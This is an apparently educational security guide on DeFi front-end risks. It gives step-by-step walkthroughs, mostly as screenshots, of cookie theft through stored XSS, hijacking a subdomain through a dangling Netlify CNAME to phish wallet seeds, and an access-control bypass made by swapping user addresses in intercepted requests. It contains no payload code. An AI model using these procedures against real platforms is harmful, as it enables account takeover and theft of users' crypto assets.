# Risks in DeFi

## Front-end Malicious Script

Front-end Malicious Script: This malicious script will upload users' DASH coin account balance, keystore or private key, seed, and other critical information to a malicious address. A front-end vulnerability refers to a security flaw existing in the user interface or front-end code of a DeFi application, which may result in the theft or manipulation of users' funds or sensitive information by attackers. This includes malicious script injection, cross-site scripting (XSS), clickjacking, and more.

### For example:

There is an XSS vulnerability in the personal profile name field of a certain trading platform's backend. This vulnerability allows for the injection of malicious scripts.

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2FVYH6RQ23AsKbcK27dH0Z%2F1.png?alt=media&#x26;token=2f623a4f-a376-49d2-b54f-e033195f0c62" alt=""><figcaption></figcaption></figure>

Step 1 : Intercept the current data packet and insert malicious code after the name kite.

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2FCjZTMdsOdcWQgG3PouRL%2F2.png?alt=media&#x26;token=bd0215c5-1ac0-47f0-964b-097e13e72678" alt=""><figcaption></figcaption></figure>

Step 2 :  Send data packets, view the status of the current web page, and successfully return the cookie information of the currently logged-in user.

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2F2ootalKViq9dSyQOk9nT%2F3.png?alt=media&#x26;token=428c5fb1-a4d7-4866-9e8b-494869bc9d56" alt=""><figcaption></figcaption></figure>

Step 3 : Replace the payload with and wait for the XSS platform to receive it. When a user visits this page, the XSS platform can obtain the victim's user login credentials.

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2FjEomSUYs5zNMvzmGy2Rs%2F4.png?alt=media&#x26;token=4e913fba-18ff-4806-8fe7-4209c54013f2" alt=""><figcaption></figcaption></figure>

Step 4 : Copy the intercepted cookie and enter the command document.cookie information in the developer mode console to log in the user.

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2Fxy9BudVZQYKyoyh4pUNS%2F5.png?alt=media&#x26;token=a84fee9c-4443-46f4-ac1f-11c7c3d590cd" alt=""><figcaption></figcaption></figure>

## Domain Hijacking

### For example:

Step 1 : Access URL: [https:/xx.com/](https://dashboard.galxe.com/)

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2FBogyCjn51UsEgRxPZUz7%2Fyumingjiechi1.png?alt=media&#x26;token=292216a6-6529-46bd-ae29-fedeb5e2a459" alt=""><figcaption></figcaption></figure>

Step 2 : Check the cname of xx.com in dashboard-xx.netlify.app.

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2Fe9xDHLpAbZTEreKAxo09%2Fyuming2.png?alt=media&#x26;token=e4b1a716-ee5f-488d-99a0-0f8dc467efaa" alt=""><figcaption></figcaption></figure>

Step 3 :  Create and deploy Nextjs application templates on <https://www.netlify.com>.

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2FNjxe9MNdh1A4NpKWtCOu%2Fyuming3.png?alt=media&#x26;token=a3741617-ac10-4056-a354-8005031098dc" alt=""><figcaption></figcaption></figure>

Step 4 : Add an additional subdomain under the Domain Management tab.

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2FuqDQKyrYRkd8ia2IBkQU%2Fyuming4.png?alt=media&#x26;token=5a21e0f2-7ac7-4bbd-b986-02fd5182a62c" alt=""><figcaption></figcaption></figure>

Step 5 : xx.com is added to the custom field. This extra subdomain will be set as the "main domain", and the netflix domain will be set as the "default subdomain".

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2FBXZJe3Yw7H1AZJbvM1it%2Fyuming5.png?alt=media&#x26;token=fb9c1f68-2900-4c3d-ac5e-3b6b0500e6b6" alt=""><figcaption></figcaption></figure>

Step 6 : Visit the URL <https://xx.com>, and its interface is changed to the Nextjs template set earlier.

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2FxhgWnnucmDEclgCq5qfj%2Fyuming6.png?alt=media&#x26;token=ad84fada-f2f4-48f7-ad8f-025e2b3d0df3" alt=""><figcaption></figcaption></figure>

At this time, the domain name has been successfully maliciously hijacked, which can require users to enter their mnemonic words or private keys, seeking to steal users' personal information and cryptocurrency wallet assets.

## Off-chain data source tampering

### For example:

After the current user logs in, click My NFT, and you can see that the current user does not have any NFT assets.

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2FYuJW4mSGyij615jRcSAS%2Fcuangai1.png?alt=media&#x26;token=10a9c947-2543-4c61-a868-cc2892c68eac" alt=""><figcaption></figcaption></figure>

Step 1 : Obtain other user addresses in the NFT market, and obtain the current user address from the link: 0xfB67dc...

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2F424XDIcRjZlN5sglFqpx%2Fcg2.png?alt=media&#x26;token=cfddb74a-d955-45d9-806e-3538ef3d6868" alt=""><figcaption></figcaption></figure>

Step 2 : Go back to my nft interface and click sale to capture the packet.

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2FgcJChznPBfDhblUq6vmK%2Fcg3.png?alt=media&#x26;token=6f974fea-cd1d-40fe-93df-d39e3bca8b90" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2FVvq1stJORTTjCt7JBdBU%2Fcg4.png?alt=media&#x26;token=eea9a6ee-c099-4b7f-bfa5-a84127cc0531" alt=""><figcaption></figcaption></figure>

Step 3 : Replace useraddress with 0xfB67dc31....

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2FFT1P6yqhWRGEGtNcscqJ%2Fcg5.png?alt=media&#x26;token=c6ebd17a-bc0b-4446-9620-2bf3b5ab74cf" alt=""><figcaption></figcaption></figure>

Step 4 : Modify the message before sending the data.

Step 5 : Click Collection to obtain data information, and successfully switch to the NFT management background of user 0xfB67dc31..

<figure><img src="https://1958959434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFQPoyXrMUD1C4DzLY5ER%2Fuploads%2F95Xaifr3LWgr9OS98qVY%2Fcg6.png?alt=media&#x26;token=12e8abbc-5e95-457d-ae1c-772f93dc36d7" alt=""><figcaption></figcaption></figure>

By modifying the address of the data package, you can successfully exceed the authority to other accounts, and perform arbitrary casting or selling operations on other users' assets.